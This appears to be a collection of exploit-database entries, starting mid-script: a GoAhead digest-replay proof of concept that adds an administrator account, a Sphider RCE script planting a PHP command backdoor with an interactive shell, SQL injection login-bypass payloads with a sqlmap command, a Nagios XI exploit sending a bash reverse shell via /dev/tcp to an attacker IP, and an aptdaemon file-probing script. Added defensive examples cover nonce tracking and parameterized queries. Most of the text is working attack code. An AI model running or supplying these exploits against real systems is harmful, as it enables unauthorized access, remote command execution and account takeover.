           "Accept-Language": "mk-MK;q=0.9,mk;q=0.8",
           "Connection": "close"}

data = {"FormSubmitCause": "button",
        "DefinitionAction": "add",
        "Define_admin_ID": "admin",
        "Define_admin_Name": "admin",
        "Define________Action________ID": '',
        "Define________Action________Name": "testingus",
        "Define________Action________Password": "testingus",
        "Define________Action________Group": "Administrators"}

requests.post(url, headers=headers, cookies=kolache, data=data)

print("Finito")
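
The description above attributes the replay to a nonce that stays valid for a fixed 5 minutes. The following added example (not GoAhead's code and not its patch) contrasts that check with one common mitigation, a short nonce lifetime plus nonce-count (nc) tracking per nonce. The class and function names, the credentials and the URI are constructed for this example.

```python
import hashlib
import hmac
import secrets

REALM = "GoAhead"                          # realm string from the PoC header
USERS = {"admin": "constructed-password"}  # constructed credentials


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(user, password, method, uri, nonce, nc, cnonce):
    """RFC 2617 'response' value for algorithm=MD5, qop=auth."""
    ha1 = md5_hex(f"{user}:{REALM}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:auth:{ha2}")


class DigestVerifier:
    """Server-side check of an already parsed Authorization header."""

    def __init__(self, lifetime, track_nc):
        self.lifetime = lifetime   # seconds a nonce stays valid
        self.track_nc = track_nc   # require a strictly increasing nc per nonce
        self.nonces = {}           # nonce -> [issued_at, highest nc accepted]

    def challenge(self, now):
        nonce = secrets.token_hex(16)
        self.nonces[nonce] = [now, 0]
        return nonce

    def verify(self, auth, method, now):
        state = self.nonces.get(auth["nonce"])
        if state is None:
            return False                      # nonce was never issued here
        if now - state[0] > self.lifetime:
            del self.nonces[auth["nonce"]]    # stale: client must re-authenticate
            return False
        password = USERS.get(auth["username"])
        if password is None:
            return False
        expected = digest_response(auth["username"], password, method,
                                   auth["uri"], auth["nonce"], auth["nc"],
                                   auth["cnonce"])
        if not hmac.compare_digest(expected, auth["response"]):
            return False
        if self.track_nc:
            # nc is covered by the response hash, so a captured header cannot
            # be given a fresh nc without knowing the password.
            try:
                nc = int(auth["nc"], 16)
            except ValueError:
                return False
            if nc <= state[1]:
                return False                  # nc already used: replayed header
            state[1] = nc
        return True


def client_header(nonce, nc, uri, method="POST"):
    """Build the header fields a legitimate client would send."""
    cnonce, nc_text = secrets.token_hex(8), f"{nc:08x}"
    return {"username": "admin", "nonce": nonce, "uri": uri,
            "nc": nc_text, "cnonce": cnonce,
            "response": digest_response("admin", USERS["admin"], method, uri,
                                        nonce, nc_text, cnonce)}


def run_scenario(verifier, uri="/goform/example"):
    """One login, then the first header is presented again at 10 s and 120 s."""
    nonce = verifier.challenge(now=0)
    first = client_header(nonce, 1, uri)
    second = client_header(nonce, 2, uri)
    return {
        "first": verifier.verify(first, "POST", now=1),
        "next": verifier.verify(second, "POST", now=5),
        "replay_soon": verifier.verify(first, "POST", now=10),
        "replay_late": verifier.verify(first, "POST", now=120),
    }


if __name__ == "__main__":
    print("5 min window, no nc tracking:", run_scenario(DigestVerifier(300, False)))
    print("30 s window, nc tracking:    ", run_scenario(DigestVerifier(30, True)))
```

Neither setting protects the request body or replaces TLS; the description itself notes that the bypass applies when TLS is not used.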
            
# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
# Google Dork: intitle:"Sphider Admin Login"
# Date: 2014-07-28
# Exploit Author: Gurkirat Singh
# Vendor Homepage: http://www.sphider.eu/
# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
# Version: v1.3.6
# Tested on: Windows and Linux
# CVE : CVE-2014-5194
# Proof of Concept: https://www.exploit-db.com/exploits/34189

from argparse import ArgumentParser, RawTextHelpFormatter
from huepy import *
import string
import random
from bs4 import BeautifulSoup, Tag
from requests import Session
from randua import generate as randua

_F = "".join(random.choices(string.ascii_letters, k=13))

parser = ArgumentParser(description="Exploit for CVE-2014-5194",
                        formatter_class=RawTextHelpFormatter)
parser.add_argument("--target",
                    "-t",
                    help="target uri where application is installed",
                    required=True,
                    metavar="",
                    dest="t")
parser.add_argument("--user",
                    "-u",
                    help="username to authenticate",
                    required=True,
                    metavar="",
                    dest="u")
parser.add_argument("--password",
                    "-p",
                    help="password to authenticate",
                    required=True,
                    metavar="",
                    dest="p")
parser.add_argument("--debug",
                    help="if passed, spawn the firefox window",
                    default=True,
                    action="store_false")
parser.add_argument("--timeout",
                    help="timeout in seconds (default: 1)",
                    dest="T",
                    metavar="",
                    default=1)
args = parser.parse_args()

if args.t.endswith("/"):
    args.t = args.t[:-1]

print(run("Logging in"))

with Session() as http:
    data = {"user": args.u, "pass": args.p}

    headers = {"User-Agent": randua()}
    http.post(args.t + '/admin/auth.php',
              data=data,
              headers=headers,
              allow_redirects=False)
    r = http.get(args.t + '/admin/admin.php',
                 headers=headers,
                 allow_redirects=False)
    html = BeautifulSoup(r.content.decode(), "lxml")
    title: Tag = html.find("title")

    if title.text == "Sphider Admin Login":
        print(bad("Failed to login"))
        exit(1)
    else:
        print(good("Logged in"))

    payload = {
        'f': 'settings',
        'Submit': '1',
        '_version_nr': '1.3.5',
        '_language': 'en',
        '_template': 'standard',
        '_admin_email': 'admin@localhost',
        '_print_results': '1',
        '_tmp_dir': 'tmp',
        '_log_dir': 'log',
        '_log_format': 'html',
        '_min_words_per_page': '10',
        '_min_word_length': '3',
        '_word_upper_bound': '100;system($_POST[cmd])',
        '_index_numbers': '1',
        '_index_meta_keywords': '1',
        '_pdftotext_path': 'c:\\temp\\pdftotext.exe',
        '_catdoc_path': 'c:\\temp\\catdoc.exe',
        '_xls2csv_path': 'c:\\temp\\xls2csv',
        '_catppt_path': 'c:\\temp\\catppt',
        '_user_agent': 'Sphider',
        '_min_delay': '0',
        '_strip_sessids': '1',
        '_results_per_page': '10',
        '_cat_columns': '2',
        '_bound_search_result': '0',
        '_length_of_link_desc': '0',
        '_links_to_next': '9',
        '_show_meta_description': '1',
        '_show_query_scores': '1',
        '_show_categories': '1',
        '_desc_length': '250',
        '_did_you_mean_enabled': '1',
        '_suggest_enabled': '1',
        '_suggest_history': '1',
        '_suggest_rows': '10',
        '_title_weight': '20',
        '_domain_weight': '60',
        '_path_weight': '10',
        '_meta_weight': '5'
    }

    print(run("Exploiting"))
    http.post(args.t + "/admin/admin.php", data=payload)
    r = http.post(args.t + "/settings/conf.php", data={"cmd": "echo %s" % _F})
    if r.content.decode().strip() != _F:
        print(bad("Failed"))
        exit(1)
    print(good("Exploited"))
    print(info("Spawning Shell"))
    user = http.post(args.t + "/settings/conf.php", data={"cmd": "whoami"})
    host = http.post(args.t + "/settings/conf.php",
                     data={"cmd": "cat /etc/hostname"})
    shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"

    while True:
        try:
            cmd = input(shell)
            if cmd == "exit": break
            r = http.post(args.t + "/settings/conf.php", data={"cmd": cmd})
            print(r.content.decode().strip())
        except:
            break
    print()
            
# Exploit Title: Client Management System 1.0 - 'searchdata' SQL injection
# Date: 26/10/2020
# Exploit Author: Serkan Sancar
# Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841
# Version: 1.0
# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3

Step 1: Open the URL http://localhost/clientms/client/index.php

Step 2: Log in to the panel as a client user

Step 3: Use the SQL injection test payload 1' or 1=1# in the search box field

Malicious request in Burp Suite:

POST /clientms/client/search-invoices.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/clientms/client/search-invoices.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=q38d8f3sveqjciu02csdfem453
Upgrade-Insecure-Requests: 1

searchdata=1%27+or+1%3D1%23&search=

Step 4: All invoices are listed, which confirms the SQL injection in the panel.

Alternative method:
Save the inspected request from Burp Suite to a file. Exploitation is then easier with the sqlmap -r parameter.
sqlmap -r cms.txt --risk=1 --level=1 --dbms=mysql --dbs
            
# Exploit Title: CSE Bookstore Authentication Bypass
# Date: 27/10/2020
# Exploit Author: Alper Basaran
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 Enterprise 1909


CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel. 
By default the admin panel is located at /admin.php and the administrator interface can be accessed by unauthorized users exploiting the SQL injection vulnerability.

Payload: 
Name: admin
Pass: %' or '1'='1 

Sample BurpSuite intercept:

POST /bookstore/admin_verify.php HTTP/1.1
Host: 192.168.20.131
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://192.168.20.131
Connection: close
Referer: http://192.168.20.131/bookstore/admin.php
Cookie: PHPSESSID=hmqnib0ihkvo235jor7mpfoupv
Upgrade-Insecure-Requests: 1

name=admin&pass=%25%27+or+%271%27%3D%271&submit=Submit+Query
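
Why the 'Pass' value above is accepted, and the fix, shown as an added example that is not the application's code: the table layout and the concatenated query are assumptions about how such a login check is typically written, the row is constructed, and SQLite stands in for MySQL.

```python
import sqlite3

PAYLOAD = "%' or '1'='1"   # 'Pass' value from the advisory above


def make_db():
    """In-memory stand-in for the admin table (assumed layout, constructed row)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (name TEXT, pass TEXT)")
    # Stored in clear only to isolate the injection; real code stores a hash.
    db.execute("INSERT INTO admin VALUES ('admin', 'constructed-secret')")
    return db


def build_vulnerable_query(name, password):
    # Input is pasted into the SQL text: a quote in it closes the string
    # literal and whatever follows is parsed as SQL. With PAYLOAD the WHERE
    # clause becomes (name = 'admin' AND pass = '%') OR '1'='1'.
    return f"SELECT name FROM admin WHERE name = '{name}' AND pass = '{password}'"


def login_vulnerable(db, name, password):
    try:
        row = db.execute(build_vulnerable_query(name, password)).fetchone()
        return row is not None
    except sqlite3.OperationalError:
        return "sql-error"   # e.g. a legitimate password containing a quote


def login_hardened(db, name, password):
    # Placeholders send the values separately from the statement, so they
    # are only ever compared as data.
    row = db.execute("SELECT name FROM admin WHERE name = ? AND pass = ?",
                     (name, password)).fetchone()
    return row is not None


def compare():
    """Return {case: (vulnerable result, hardened result)} for four inputs."""
    db = make_db()
    cases = {
        "correct": ("admin", "constructed-secret"),
        "wrong": ("admin", "guess"),
        "payload": ("admin", PAYLOAD),
        "quote": ("admin", "it's"),
    }
    return {label: (login_vulnerable(db, *creds), login_hardened(db, *creds))
            for label, creds in cases.items()}


if __name__ == "__main__":
    for label, (vulnerable, hardened) in compare().items():
        print(f"{label:8} vulnerable={vulnerable!s:10} hardened={hardened}")
```

The same parameter binding applies to the 'searchdata' query in the Client Management System entry above.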
            
# Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)
# Date: 10-27-2020
# Vulnerability Discovery: Chris Lyne
# Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 20.04
# CVE: CVE-2020-5791

#!/usr/bin/python3

import re
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Credit: Chris Lyne for vulnerability discovery and original PoC

if len(sys.argv) != 6:
    print("[~] Usage : ./exploit.py https://NagiosXI_Host/, Username, Password, Attacker IP, Attacker Port")
    exit()

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
attacker_ip = sys.argv[4]
attacker_port = sys.argv[5]

login_url = host + "/nagiosxi/login.php"
payload = ";/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1';".format(attacker_ip, attacker_port)
encoded_payload = urllib.parse.quote_plus(payload)


def exploit():
    s = requests.Session()
    login_page = s.get(login_url)
    nsp = re.findall('var nsp_str = "(.*?)"', login_page.text)
    
    res = s.post(
        login_url,
        data={
            'nsp': nsp,
            'page': 'auth',
            'debug': '',
            'pageopt': 'login',
            'redirect': '/nagiosxi/index.php?',
            'username': username,
            'password': password,
            'loginButton': ''
        },
        verify=False,
        allow_redirects=True
    )
    
    injection_url = host + "/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file={0}".format(encoded_payload)
    res = s.get(injection_url)
    
    if res.status_code != 200:
        print("[~] Failed to connect")
    
if __name__ == '__main__':
    exploit()
            
# Exploit Title: File Existence Disclosure in aptdaemon <= 1.1.1+bzr982-0ubuntu32.1
# Date: 2020-10-27
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
# Vendor Homepage: https://wiki.debian.org/aptdaemon
# Software Link: https://wiki.debian.org/aptdaemon
# Version: <= 1.1.1+bzr982-0ubuntu32.1
# Tested on: Ubuntu 20.04
#
#!/usr/bin/env python3
#
# Ubuntu 16.04 - 20.04 
# Debian 9 - 11
# aptdaemon < 1.1.1+bzr982-0ubuntu32.1
# Sensitive Information Disclosure
# 
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
#
# There is no input validation on the Locale property in an 
# apt transaction. An unprivileged user can supply a full path
# to a writable directory, which lets aptd read a file as root. 
# Having a symlink in place results in an error message if the 
# file exists, and no error otherwise. This way an unprivileged 
# user can check for the existence of any files on the system 
# as root.
#
# This is a similar type of bug as CVE-2015-1323.
#
# 
# $ ./test_file_exists.py /root/.bashrc
# File Exists!
# $ ./test_file_exists.py /root/.bashrca
# File does not exist!
#
#

import dbus
import os
import sys

if len(sys.argv) != 2:
	print("Checks if file exists")
	print("Usage: %s <file>" % sys.argv[0])
	sys.exit(0)

FILE_TO_CHECK = sys.argv[1]

bus = dbus.SystemBus()
apt_dbus_object = bus.get_object("org.debian.apt", "/org/debian/apt")
apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.debian.apt")  

# just use any valid .deb file
trans = apt_dbus_interface.InstallFile("/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb", False)

apt_trans_dbus_object = bus.get_object("org.debian.apt", trans)
apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.debian.apt.transaction")

properties_manager = dbus.Interface(apt_trans_dbus_interface, 'org.freedesktop.DBus.Properties')

os.mkdir("/tmp/a")
os.mkdir("/tmp/a/LC_MESSAGES")
os.symlink(FILE_TO_CHECK, "/tmp/a/LC_MESSAGES/aptdaemon.mo")

try:
	properties_manager.Set("org.debian.apt.transaction", "Locale", "/tmp/a.")
except:
	print("File Exists!")
	pass
else:
	print("File does not exist!")

os.unlink("/tmp/a/LC_MESSAGES/aptdaemon.mo")
os.rmdir("/tmp/a/LC_MESSAGES")
os.rmdir("/tmp/a")